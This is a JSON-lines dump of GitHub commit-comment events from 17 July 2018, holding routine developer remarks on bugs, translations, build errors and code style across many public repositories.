{"id":"7976434902","type":"CommitCommentEvent","actor":{"login":"AmebaBrain"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29734197,"position":169,"line":169,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T12:41:50Z","updated_at":"2018-07-17T12:41:50Z","author_association":"NONE","body":"Dear @petebacondarwin && @gkalpak \r\n\r\nFor me on latest Chrome 67 scrollHeight is **always** equal to clientHeight. Thus, maxScrollTop is always 0 and active element is sticked to last one in ScrollSpiedElementGroup.onScroll\r\n\r\nIf I change it to **window.innerHeight** it became working.\r\nMay be it worths to add smth like `window.innerHeight || this.doc.body.scrollHeight || Number.MAX_SAFE_INTEGER`?\r\n\r\nThank you"}},"created_at":"2018-07-17T12:41:50Z"}
{"id":"7976436876","type":"CommitCommentEvent","actor":{"login":"tobyjamez"},"repo":{"name":"bombrun/GaiaLab"},"payload":{"comment":{"id":29734201,"position":null,"line":null,"path":null,"commit_id":"6f8bc43eb91a64cce7ec2554025b06f85796be91","created_at":"2018-07-17T12:42:13Z","updated_at":"2018-07-17T12:42:13Z","author_association":"COLLABORATOR","body":"i realised you can't import python modules starting with a . (duh) so renamed the conf file and edited the gitignore"}},"created_at":"2018-07-17T12:42:13Z"}
{"id":"7976440019","type":"CommitCommentEvent","actor":{"login":"gabor-farkas"},"repo":{"name":"skarzhevskyy/gwt-mock-2.5.1"},"payload":{"comment":{"id":29734205,"position":null,"line":null,"path":null,"commit_id":"7e675841d3d19a627383fe2d39f5850c8793c9e2","created_at":"2018-07-17T12:42:47Z","updated_at":"2018-07-17T12:42:47Z","author_association":"NONE","body":"yes actually to be exact this should be a new forked repository named gwt-mock-2.8.0 - but that would be quite impractical ... Though, if I understand right, gwt 2.5.1 doesn't accept null in this method, I don't think relying on this kind of stuff should be the scope of tests written with the help of gwt-mock, so these changes are welcome!\r\nThanks\r\n(we have also recently migrated to gwt 2.8.0, but fortunately it works seamlessly with the old mock)"}},"created_at":"2018-07-17T12:42:47Z"}
{"id":"7976441614","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29734211,"position":null,"line":null,"path":null,"commit_id":"3a7e9b8db80e42340425d26a9efbbf4ef532d037","created_at":"2018-07-17T12:43:07Z","updated_at":"2018-07-17T12:43:07Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107\r\nhttps://github.com/canmet-energy/btap_tasks/issues/91"}},"created_at":"2018-07-17T12:43:07Z"}
{"id":"7976442795","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29734219,"position":null,"line":null,"path":null,"commit_id":"1aea700b1fff0f0200d63e40eab0ae3933dfa643","created_at":"2018-07-17T12:43:19Z","updated_at":"2018-07-17T12:43:19Z","author_association":"OWNER","body":"Thank you Stefan for your suggestion. In fact the idea itself is not good (I know it). But I have a more deep problem that I want to correct. Perhaps you will have a simple idea.\r\n\r\nIn the \"playout\" idea developed by Stefano80 (and some help of me), we play the game for several plies after PV.\r\nSee http://tests.stockfishchess.org/tests/view/5b4c5cbe0ebc5902bdb778f3\r\n\r\nWith the function \"::search<NonPV>(rootPos, ss+1, ttValue - 1, ttValue, newDepth, false);\", the best move is not always saved (it is saved only if bestvalue > alpha). So the playout is stopped quickly.\r\n\r\nMore simply, I want to do a search at fixed depth and save the best move in the TT after the search. Actually it seems to me that I can't do it easily because of null window limitation for nonPV nodes. Do you have a simple idea to do it? Perhaps I must add an option for the search function ?"}},"created_at":"2018-07-17T12:43:19Z"}
{"id":"7976443278","type":"CommitCommentEvent","actor":{"login":"omichal"},"repo":{"name":"netvoicecz/iot-platform"},"payload":{"comment":{"id":29734223,"position":null,"line":null,"path":null,"commit_id":"64dc8168548303524c64b1a427395ef44d9c108c","created_at":"2018-07-17T12:43:23Z","updated_at":"2018-07-17T12:43:23Z","author_association":"MEMBER","body":"__API Description file syntax error on line 1050__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-17T12:43:23Z"}
{"id":"7976444689","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29734226,"position":null,"line":null,"path":null,"commit_id":"826213dea4f1fbe5f6b529590805e94d8ecb83b2","created_at":"2018-07-17T12:43:39Z","updated_at":"2018-07-17T12:43:39Z","author_association":"NONE","body":"マークダウン形式、ちゃんと表示出来てますね。配置するディレクトリだけ問題文のpathと違います。\r\n下記ディレクトリにgit mvで移動してみてください。\r\nsrc/algo-s2/ → docs/algo-s2/\r\n\r\nアスタリスクで書くのは「箇条書き」と覚えておいて、文章の部分は何もつけずただ書いて良いですよ。\r\n例えば、\r\n・if\r\n・for\r\n・while\r\nみたいに箇条書きでリスト表示したい時に使います。"}},"created_at":"2018-07-17T12:43:39Z"}
{"id":"7976445805","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"react-component/tree"},"payload":{"comment":{"id":29734231,"position":null,"line":null,"path":null,"commit_id":"7a0b57b3571ab819513fa9c7fe277b2e72f2d619","created_at":"2018-07-17T12:43:51Z","updated_at":"2018-07-17T12:43:51Z","author_association":"MEMBER","body":"also fix https://github.com/ant-design/ant-design/issues/11110"}},"created_at":"2018-07-17T12:43:51Z"}
{"id":"7976446601","type":"CommitCommentEvent","actor":{"login":"dorukcakmakci"},"repo":{"name":"iVis-at-Bilkent/newt"},"payload":{"comment":{"id":29734234,"position":null,"line":null,"path":null,"commit_id":"9885d6a51a8f372d32f422abd938e38961ec6064","created_at":"2018-07-17T12:44:00Z","updated_at":"2018-07-17T12:44:00Z","author_association":"CONTRIBUTOR","body":"#326 "}},"created_at":"2018-07-17T12:44:00Z"}
{"id":"7976448238","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29734242,"position":6,"line":56,"path":"xwiki-platform-core/xwiki-platform-scheduler/xwiki-platform-scheduler-ui/src/main/resources/XWiki/SchedulerJobSheet.xml","commit_id":"ebee9dca53411daf53fb1fc49acf6c1695cd4500","created_at":"2018-07-17T12:44:19Z","updated_at":"2018-07-17T12:44:19Z","author_association":"CONTRIBUTOR","body":"You can also use the shorter version `$!job.getValue('script')` and `!=''`, with single quotes."}},"created_at":"2018-07-17T12:44:19Z"}
{"id":"7976456203","type":"CommitCommentEvent","actor":{"login":"sparrowDom"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29734263,"position":14,"line":734,"path":"translations/sl/LC_MESSAGES/messages.pot","commit_id":"c8ac68b08c41a99943755feb9cc3d70c1fae426c","created_at":"2018-07-17T12:45:44Z","updated_at":"2018-07-17T12:45:44Z","author_association":"NONE","body":"@wanderingstan it would sound better as ```Produktni načrtovalec```\r\n\r\n"}},"created_at":"2018-07-17T12:45:44Z"}
{"id":"7976457936","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29734274,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-17T12:46:03Z","updated_at":"2018-07-17T12:46:03Z","author_association":"OWNER","body":"@johnou no, I just checked in a pom file that generated a warning, while I fixed the JDK incompatibility. :) I could still use your help with Maven. "}},"created_at":"2018-07-17T12:46:03Z"}
{"id":"7976466062","type":"CommitCommentEvent","actor":{"login":"erfanoabdi"},"repo":{"name":"MotoZ-2016/android_vendor_motorola_griffin"},"payload":{"comment":{"id":29734292,"position":null,"line":null,"path":null,"commit_id":"8d0b179e22f0170e6a78ef15c59e2792209da43a","created_at":"2018-07-17T12:47:37Z","updated_at":"2018-07-17T12:47:37Z","author_association":"MEMBER","body":"in protobuf source here https://github.com/google/protobuf/blob/2.7.0/src/google/protobuf/stubs/common.h#L99\r\nneed to be 3000000 iirc\r\n"}},"created_at":"2018-07-17T12:47:37Z"}
{"id":"7976467539","type":"CommitCommentEvent","actor":{"login":"duckonst1"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29734294,"position":5,"line":15,"path":"test/integration/lib/first-time.js","commit_id":"7fb862356873fc4c5dc28e5c7389f71424985b0f","created_at":"2018-07-17T12:47:53Z","updated_at":"2018-07-17T12:47:53Z","author_association":"NONE","body":"Â"}},"created_at":"2018-07-17T12:47:53Z"}
{"id":"7976468847","type":"CommitCommentEvent","actor":{"login":"Durza007"},"repo":{"name":"ValveSoftware/vogl"},"payload":{"comment":{"id":29734298,"position":null,"line":null,"path":null,"commit_id":"6846f4e8df90fc762fe241e2384a1973a9bf5784","created_at":"2018-07-17T12:48:09Z","updated_at":"2018-07-17T12:48:09Z","author_association":"NONE","body":"```\r\n./vogl/src/voglreplay/replay_tool_trace.cpp:129:58: error: ordered comparison between pointer and zero ('char *' and 'int') [Semantic Issue]\r\n    if ((file_utils::get_exec_filename(buf, sizeof(buf)) <= 0))\r\n         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ^  ~\r\n```\r\nThis is the error you can get on macOS."}},"created_at":"2018-07-17T12:48:09Z"}
{"id":"7976469688","type":"CommitCommentEvent","actor":{"login":"Olgashulz"},"repo":{"name":"Olgashulz/test-rep"},"payload":{"comment":{"id":29734299,"position":null,"line":null,"path":null,"commit_id":"8ef686a551118ba48d1163257ffc665c63af93b1","created_at":"2018-07-17T12:48:17Z","updated_at":"2018-07-17T12:48:17Z","author_association":"OWNER","body":"add h1"}},"created_at":"2018-07-17T12:48:17Z"}
{"id":"7976470788","type":"CommitCommentEvent","actor":{"login":"Chaotic-Doom"},"repo":{"name":"Chaotic-Doom/OCRTunes-Project"},"payload":{"comment":{"id":29734300,"position":9,"line":17,"path":"Program.py","commit_id":"0986b774177299177b74b2b2b6e966ebe112bee5","created_at":"2018-07-17T12:48:30Z","updated_at":"2018-07-17T12:48:30Z","author_association":"OWNER","body":"You may think that there will be an Operational exception if there is an existing table, but in [SQLController](https://github.com/Chaotic-Doom/OCRTunes-Project/blob/master/SQLController.py#L22), the statement is created in a way that the sqlite database will not throw an exception, rather ignore the command if there is an existing table."}},"created_at":"2018-07-17T12:48:30Z"}
{"id":"7976472997","type":"CommitCommentEvent","actor":{"login":"sparrowDom"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29734304,"position":14,"line":770,"path":"translations/sl/LC_MESSAGES/messages.pot","commit_id":"36eccea27dc53e8ea4a2a9c3be5af0192df9f7f3","created_at":"2018-07-17T12:48:53Z","updated_at":"2018-07-17T12:48:53Z","author_association":"NONE","body":"also some enhancements and corrections here: \r\n```\r\nKath ima več kot trideset let izkušenj z zaposlovanjem in je bila devet let v operativi Appla. Prostovoljno je delala za Ignite Boulder, The Humane Society, v odraslih programih za pismenosti ter zvezi Alzheimerjeve bolezni.\r\n```"}},"created_at":"2018-07-17T12:48:53Z"}
{"id":"7976474027","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29734306,"position":null,"line":null,"path":null,"commit_id":"88939a1949123fc3a17e3464c521ebcca3f7e473","created_at":"2018-07-17T12:49:05Z","updated_at":"2018-07-17T12:49:05Z","author_association":"CONTRIBUTOR","body":"Why is it removed?"}},"created_at":"2018-07-17T12:49:05Z"}
{"id":"7976476351","type":"CommitCommentEvent","actor":{"login":"eracle"},"repo":{"name":"eracle/django-airports"},"payload":{"comment":{"id":29734308,"position":23,"line":103,"path":"airports/management/commands/airports.py","commit_id":"39444c3fb5fbd536c0f9755b20e657e80497a776","created_at":"2018-07-17T12:49:30Z","updated_at":"2018-07-17T12:49:30Z","author_association":"OWNER","body":"Thank you very much for the fix!"}},"created_at":"2018-07-17T12:49:30Z"}
{"id":"7976476943","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29734309,"position":9,"line":371,"path":"assembl/static2/js/app/utils/translations.js","commit_id":"cf92e7f2b0a4bedd8d0d41b70e95665993732a39","created_at":"2018-07-17T12:49:35Z","updated_at":"2018-07-17T12:49:35Z","author_association":"CONTRIBUTOR","body":"C'est pas très français..."}},"created_at":"2018-07-17T12:49:35Z"}
{"id":"7976478414","type":"CommitCommentEvent","actor":{"login":"fangxxiaoming"},"repo":{"name":"fangxxiaoming/web-Project"},"payload":{"comment":{"id":29734310,"position":null,"line":null,"path":null,"commit_id":"2402eb3b8ae0c737f10fe3e16bc218334ae13e77","created_at":"2018-07-17T12:49:51Z","updated_at":"2018-07-17T12:49:51Z","author_association":"OWNER","body":"sass对css预处理，使css结构简单明了"}},"created_at":"2018-07-17T12:49:51Z"}
{"id":"7976483544","type":"CommitCommentEvent","actor":{"login":"Chaotic-Doom"},"repo":{"name":"Chaotic-Doom/OCRTunes-Project"},"payload":{"comment":{"id":29734321,"position":33,"line":57,"path":"Program.py","commit_id":"0986b774177299177b74b2b2b6e966ebe112bee5","created_at":"2018-07-17T12:50:49Z","updated_at":"2018-07-17T12:50:49Z","author_association":"OWNER","body":"Conventionally, the name of the procedure should've been relative to menu but the starting menu is displayed after establishing connection with our database."}},"created_at":"2018-07-17T12:50:49Z"}
{"id":"7976485252","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29734326,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-17T12:51:07Z","updated_at":"2018-07-17T12:51:07Z","author_association":"CONTRIBUTOR","body":"Sure let's move the conversation over to the PR."}},"created_at":"2018-07-17T12:51:07Z"}
{"id":"7976487484","type":"CommitCommentEvent","actor":{"login":"Chaotic-Doom"},"repo":{"name":"Chaotic-Doom/OCRTunes-Project"},"payload":{"comment":{"id":29734351,"position":30,"line":58,"path":"Program.py","commit_id":"0986b774177299177b74b2b2b6e966ebe112bee5","created_at":"2018-07-17T12:51:31Z","updated_at":"2018-07-17T12:51:31Z","author_association":"OWNER","body":"This was used to test how arrays would be printed out to console in string form."}},"created_at":"2018-07-17T12:51:31Z"}
{"id":"7976490901","type":"CommitCommentEvent","actor":{"login":"omichal"},"repo":{"name":"netvoicecz/iot-platform"},"payload":{"comment":{"id":29734356,"position":null,"line":null,"path":null,"commit_id":"0d31739a698730698d05c21cab96ad35c37297ee","created_at":"2018-07-17T12:52:09Z","updated_at":"2018-07-17T12:52:09Z","author_association":"MEMBER","body":"__API Description file syntax error on line 1054__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-17T12:52:09Z"}
{"id":"7976491788","type":"CommitCommentEvent","actor":{"login":"JaFreire"},"repo":{"name":"andreufarran/Facilities-List-Coder"},"payload":{"comment":{"id":29734357,"position":14,"line":13,"path":"README.md","commit_id":"ffa632719103a8c2ac21071fbd16ec6bd66f6670","created_at":"2018-07-17T12:52:18Z","updated_at":"2018-07-17T12:52:18Z","author_association":"COLLABORATOR","body":"Important: urllib2 changed, now it's not called like that. In the link they explain the changes for Python 3"}},"created_at":"2018-07-17T12:52:18Z"}
{"id":"7976492432","type":"CommitCommentEvent","actor":{"login":"vlinhart"},"repo":{"name":"eracle/django-airports"},"payload":{"comment":{"id":29734358,"position":59,"line":123,"path":"airports/management/commands/airports.py","commit_id":"39444c3fb5fbd536c0f9755b20e657e80497a776","created_at":"2018-07-17T12:52:24Z","updated_at":"2018-07-17T12:52:24Z","author_association":"NONE","body":"please test this in Python3 if you can, I couldn't keep it there for py2. It seems to me that the requests library is doing the same already inside. It'd fail for accented characters during import. "}},"created_at":"2018-07-17T12:52:24Z"}
{"id":"7976499807","type":"CommitCommentEvent","actor":{"login":"eswar2020"},"repo":{"name":"eswar2020/javascript-basic"},"payload":{"comment":{"id":29734375,"position":7,"line":9,"path":"varibale.js","commit_id":"7e32a8efac50d149d1e1e3585881f6d8f2a03a3d","created_at":"2018-07-17T12:53:45Z","updated_at":"2018-07-17T12:53:45Z","author_association":"OWNER","body":"Using **const** keyword we can't change the value of the variable . Here in 7th line height variable declared with 5.8 value ,but 6.0  value is assigned in next but it gives error ."}},"created_at":"2018-07-17T12:53:45Z"}
{"id":"7976502781","type":"CommitCommentEvent","actor":{"login":"ThePiGuy0"},"repo":{"name":"MotoZ-2016/android_vendor_motorola_griffin"},"payload":{"comment":{"id":29734379,"position":null,"line":null,"path":null,"commit_id":"8d0b179e22f0170e6a78ef15c59e2792209da43a","created_at":"2018-07-17T12:54:16Z","updated_at":"2018-07-17T12:54:16Z","author_association":"NONE","body":"Ok thanks :+1: "}},"created_at":"2018-07-17T12:54:16Z"}
{"id":"7976503312","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"jdkronicz/LIMS-Web"},"payload":{"comment":{"id":29734380,"position":null,"line":null,"path":null,"commit_id":"2cca428fac73e112feebde95d7ee344a0e287049","created_at":"2018-07-17T12:54:22Z","updated_at":"2018-07-17T12:54:22Z","author_association":"NONE","body":"Nice password bruh :)"}},"created_at":"2018-07-17T12:54:22Z"}
{"id":"7976506060","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"ryetoast/cleanChipin"},"payload":{"comment":{"id":29734383,"position":null,"line":null,"path":null,"commit_id":"be771630e10737ddc02a2102ddbd2c89d93c04f0","created_at":"2018-07-17T12:54:53Z","updated_at":"2018-07-17T12:54:53Z","author_association":"NONE","body":"Thanks for the password :)"}},"created_at":"2018-07-17T12:54:53Z"}
{"id":"7976512649","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"ryetoast/cleanChipin"},"payload":{"comment":{"id":29734393,"position":null,"line":null,"path":null,"commit_id":"a62a9825f257996d0676d12cc4bceb7df6fbe4ce","created_at":"2018-07-17T12:56:04Z","updated_at":"2018-07-17T12:56:04Z","author_association":"NONE","body":"That's not a _particularly secure_ password if you ask me. Especially in public spaces "}},"created_at":"2018-07-17T12:56:04Z"}
{"id":"7976516364","type":"CommitCommentEvent","actor":{"login":"JeroenDeDauw"},"repo":{"name":"biocorecrg/SemanticFormsSelect"},"payload":{"comment":{"id":29734398,"position":5,"line":133,"path":"src/SelectField.php","commit_id":"cd4d315980361f0efed2f66b26dda1ed0ab5a88c","created_at":"2018-07-17T12:56:45Z","updated_at":"2018-07-17T12:56:45Z","author_association":"NONE","body":"This is the wrong way round :) "}},"created_at":"2018-07-17T12:56:45Z"}
{"id":"7976522431","type":"CommitCommentEvent","actor":{"login":"johnleider"},"repo":{"name":"vuetifyjs/vuetify"},"payload":{"comment":{"id":29734406,"position":5,"line":45,"path":"src/stylus/components/_lists.styl","commit_id":"f67dd403b44b66b2ef77e5f7132399580d5cc51f","created_at":"2018-07-17T12:57:50Z","updated_at":"2018-07-17T12:57:50Z","author_association":"MEMBER","body":"This should not be applied to all lists, not all lists are links"}},"created_at":"2018-07-17T12:57:50Z"}
{"id":"7976523494","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"celiho/bamazon"},"payload":{"comment":{"id":29734407,"position":null,"line":null,"path":null,"commit_id":"32e503c426696768c7f5ea2e19167c8f8d450ee6","created_at":"2018-07-17T12:58:03Z","updated_at":"2018-07-17T12:58:03Z","author_association":"NONE","body":"Yeah that's much better that way, no one will ever know that your password was `ypoons` 👍 "}},"created_at":"2018-07-17T12:58:03Z"}
{"id":"7976524122","type":"CommitCommentEvent","actor":{"login":"leoyli"},"repo":{"name":"auth0/auth0.js"},"payload":{"comment":{"id":29734409,"position":null,"line":null,"path":null,"commit_id":"fb53e8c318416ab1b29c99907a9e3cf63fe25164","created_at":"2018-07-17T12:58:10Z","updated_at":"2018-07-17T12:58:10Z","author_association":"NONE","body":"Uh... I think this change should be wait to shipped in the next v10 though... I haven't noticed this migration  until my server complains that I'm using `import` syntax in Node..."}},"created_at":"2018-07-17T12:58:10Z"}
{"id":"7976527174","type":"CommitCommentEvent","actor":{"login":"ant-tr-v"},"repo":{"name":"ant-tr-v/mybot"},"payload":{"comment":{"id":29734415,"position":12,"line":17,"path":"ww6StatBot.py","commit_id":"cf8d003f310e0ff54175c37c36cf328e21a6e54d","created_at":"2018-07-17T12:58:43Z","updated_at":"2018-07-17T12:58:43Z","author_association":"OWNER","body":"Due to merge\r\nMayby first variant was better "}},"created_at":"2018-07-17T12:58:43Z"}
{"id":"7976527877","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29734417,"position":null,"line":null,"path":null,"commit_id":"3d03d4b653eae69e31ef21eb76b166b0c9e92145","created_at":"2018-07-17T12:58:50Z","updated_at":"2018-07-17T12:58:50Z","author_association":"CONTRIBUTOR","body":"Added insurance"}},"created_at":"2018-07-17T12:58:50Z"}
{"id":"7976529019","type":"CommitCommentEvent","actor":{"login":"ant-tr-v"},"repo":{"name":"ant-tr-v/mybot"},"payload":{"comment":{"id":29734421,"position":53,"line":168,"path":"ww6StatBot.py","commit_id":"cf8d003f310e0ff54175c37c36cf328e21a6e54d","created_at":"2018-07-17T12:59:04Z","updated_at":"2018-07-17T12:59:04Z","author_association":"OWNER","body":"New"}},"created_at":"2018-07-17T12:59:04Z"}
{"id":"7976530084","type":"CommitCommentEvent","actor":{"login":"DylanVanAssche"},"repo":{"name":"oSoc18/SmartFlanders"},"payload":{"comment":{"id":29734429,"position":null,"line":null,"path":null,"commit_id":"ac0ca38fd2b4c250250acceea5a9fc43a26a4a4a","created_at":"2018-07-17T12:59:16Z","updated_at":"2018-07-17T12:59:16Z","author_association":"COLLABORATOR","body":"Nice!"}},"created_at":"2018-07-17T12:59:16Z"}
{"id":"7976531063","type":"CommitCommentEvent","actor":{"login":"DylanVanAssche"},"repo":{"name":"oSoc18/SmartFlanders"},"payload":{"comment":{"id":29734435,"position":null,"line":null,"path":null,"commit_id":"ac0ca38fd2b4c250250acceea5a9fc43a26a4a4a","created_at":"2018-07-17T12:59:26Z","updated_at":"2018-07-17T12:59:26Z","author_association":"COLLABORATOR","body":"@LieselotGeirnaert "}},"created_at":"2018-07-17T12:59:26Z"}
{"id":"7976531529","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734436,"position":5,"line":5,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T12:59:32Z","updated_at":"2018-07-17T12:59:32Z","author_association":"NONE","body":" Отлично, но совершенно излишне дублировать в имени метода имя класса"}},"created_at":"2018-07-17T12:59:32Z"}
{"id":"7976532071","type":"CommitCommentEvent","actor":{"login":"KevinOConnor"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29734439,"position":null,"line":null,"path":null,"commit_id":"e35f926ca63c704c55f4824226cb91a6d38fcfa6","created_at":"2018-07-17T12:59:38Z","updated_at":"2018-07-17T12:59:38Z","author_association":"OWNER","body":"On Mon, Jul 16, 2018 at 08:16:57AM -0700, Florian Heilmann wrote:\n> I was wondering if I could use this functionality to implement idle current reduction in the TMC2660 steppers I'm using. This would require sending an SPI command to the drivers to reduce the current once the steppers are supposed to idle, but also to send another command to raise the current again before any normal stepper movement can continue.\n\nThe mechanism that idle_timeout uses would be too coarse for that type\nof control.  I think implenting that would need to be done in the\nstepper.py or the kinematic code.\n\n-Kevin\n"}},"created_at":"2018-07-17T12:59:38Z"}
{"id":"7976532675","type":"CommitCommentEvent","actor":{"login":"mkutny"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29734440,"position":null,"line":null,"path":null,"commit_id":"042eb4ee44102a27ffbc86689b0ef438efb75f7d","created_at":"2018-07-17T12:59:45Z","updated_at":"2018-07-17T12:59:45Z","author_association":"CONTRIBUTOR","body":"Just to let you know that this is exactly opposite of what we've done here some time ago: #889\r\n\r\nThe logic was the following: we have `fetchOpenOrders` to get orders in 'open' status and thus `fetchClosedOrders` are for orders in 'closed' status. Making `fetchClosed` to be responsible for both 'closed' and 'canceled' introduces a bit of asymmetry into design.\r\n\r\nAt the same time, I understand that intuitively 'closed' rather relates to both \"fulfilled and canceled\" then to just \"fulfilled\"."}},"created_at":"2018-07-17T12:59:45Z"}
{"id":"7976532854","type":"CommitCommentEvent","actor":{"login":"digodk"},"repo":{"name":"BitsPleaseBr/bits-please"},"payload":{"comment":{"id":29734441,"position":34,"line":34,"path":"src/control/bean/Bean.java","commit_id":"8409a2f3f62915293313f99ae630b65f9766014b","created_at":"2018-07-17T12:59:47Z","updated_at":"2018-07-17T12:59:47Z","author_association":"COLLABORATOR","body":"não faltou terminar esse comentário? haha"}},"created_at":"2018-07-17T12:59:47Z"}
{"id":"7976533727","type":"CommitCommentEvent","actor":{"login":"TheSkwiggs"},"repo":{"name":"audreyf72/Bamazon"},"payload":{"comment":{"id":29734445,"position":null,"line":null,"path":null,"commit_id":"1cc71172f6f3073e28db17fc69b30eb09450ff9b","created_at":"2018-07-17T12:59:55Z","updated_at":"2018-07-17T12:59:55Z","author_association":"NONE","body":"Yeah that other one was a bit too easy to figure out ngl"}},"created_at":"2018-07-17T12:59:55Z"}
{"id":"7976538602","type":"CommitCommentEvent","actor":{"login":"AmebaBrain"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29734460,"position":181,"line":181,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T13:00:43Z","updated_at":"2018-07-17T13:00:43Z","author_association":"NONE","body":"Dear @petebacondarwin && @gkalpak\r\n\r\nFor me on latest Chrome 67 scrollHeight is always equal to clientHeight. Thus, maxScrollTop is always 0 and active element is sticked to last one in ScrollSpiedElementGroup.onScroll\r\n\r\nIf I change it to window.innerHeight it became working.\r\nMay be it worths to add smth like window.innerHeight || this.doc.body.clientHeight || 0?\r\n\r\nThank you"}},"created_at":"2018-07-17T13:00:43Z"}
{"id":"7976539897","type":"CommitCommentEvent","actor":{"login":"pelle"},"repo":{"name":"uport-project/ethr-did"},"payload":{"comment":{"id":29734464,"position":36,"line":159,"path":"README.md","commit_id":"62540ccb6adb4c44c01641177ca7ceaf3016663b","created_at":"2018-07-17T13:00:56Z","updated_at":"2018-07-17T13:00:56Z","author_association":"CONTRIBUTOR","body":"This is the actual unverified JWT"}},"created_at":"2018-07-17T13:00:56Z"}
{"id":"7976540752","type":"CommitCommentEvent","actor":{"login":"hidehiko7777"},"repo":{"name":"hidehiko7777/assessment"},"payload":{"comment":{"id":29734466,"position":null,"line":null,"path":null,"commit_id":"0dcffc98e4b2ae36082c5a3a58e26d03ce99c494","created_at":"2018-07-17T13:01:04Z","updated_at":"2018-07-17T13:01:04Z","author_association":"OWNER","body":"#1に対する対応を行いました"}},"created_at":"2018-07-17T13:01:04Z"}
{"id":"7976542627","type":"CommitCommentEvent","actor":{"login":"ant-tr-v"},"repo":{"name":"ant-tr-v/mybot"},"payload":{"comment":{"id":29734470,"position":27,"line":86,"path":"ww6StatBotPlayer.py","commit_id":"cf8d003f310e0ff54175c37c36cf328e21a6e54d","created_at":"2018-07-17T13:01:23Z","updated_at":"2018-07-17T13:01:23Z","author_association":"OWNER","body":"Не хватает стамины"}},"created_at":"2018-07-17T13:01:23Z"}
{"id":"7976543803","type":"CommitCommentEvent","actor":{"login":"pelle"},"repo":{"name":"uport-project/ethr-did"},"payload":{"comment":{"id":29734474,"position":16,"line":142,"path":"README.md","commit_id":"62540ccb6adb4c44c01641177ca7ceaf3016663b","created_at":"2018-07-17T13:01:37Z","updated_at":"2018-07-17T13:01:37Z","author_association":"CONTRIBUTOR","body":"This is the result of running verifyJWT not the unverified JWT"}},"created_at":"2018-07-17T13:01:37Z"}
{"id":"7976544170","type":"CommitCommentEvent","actor":{"login":"carct"},"repo":{"name":"Microsoft/vsts-agent"},"payload":{"comment":{"id":29734475,"position":11,"line":18,"path":"docs/preview/outputvariable.md","commit_id":"4ae90b42c97c285a1a83541fb81872cc0ba0c14d","created_at":"2018-07-17T13:01:40Z","updated_at":"2018-07-17T13:01:40Z","author_association":"NONE","body":"this doesn't seem to work, I have added this to the json and then imported the release definition, when re-exporting after saving it, this doesn't show up in the json anymore.\r\nalso, not appearing in the web-gui under output variables > variable list\r\nhave set the Reference Name as well\r\nas a side note, it also doesn't seem to accept the input variable (on other task) as Environment Variables (saving it, re-opening in edit and it doesn't show up in that section)\r\n\r\nPS: trying to use task from Microsoft: Powershell Script with a simple in-line:\r\nWrite-Host \"##vso[task.setvariable variable=testvar; isSecret=false;isOutput=true;]THEtest\"\r\n\r\nany thoughts on the matter ? thanks in advance!"}},"created_at":"2018-07-17T13:01:40Z"}
{"id":"7976547637","type":"CommitCommentEvent","actor":{"login":"seb-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29734478,"position":null,"line":null,"path":null,"commit_id":"57676dc7d10b50bee44d122d48863586b18e4593","created_at":"2018-07-17T13:02:18Z","updated_at":"2018-07-17T13:02:18Z","author_association":"NONE","body":"@mart-e thanks for the heads up, I'm just not used to checking previous versions yet.\r\n\r\nSo what now, do I also make the change in v9 even though it's already in master?"}},"created_at":"2018-07-17T13:02:18Z"}
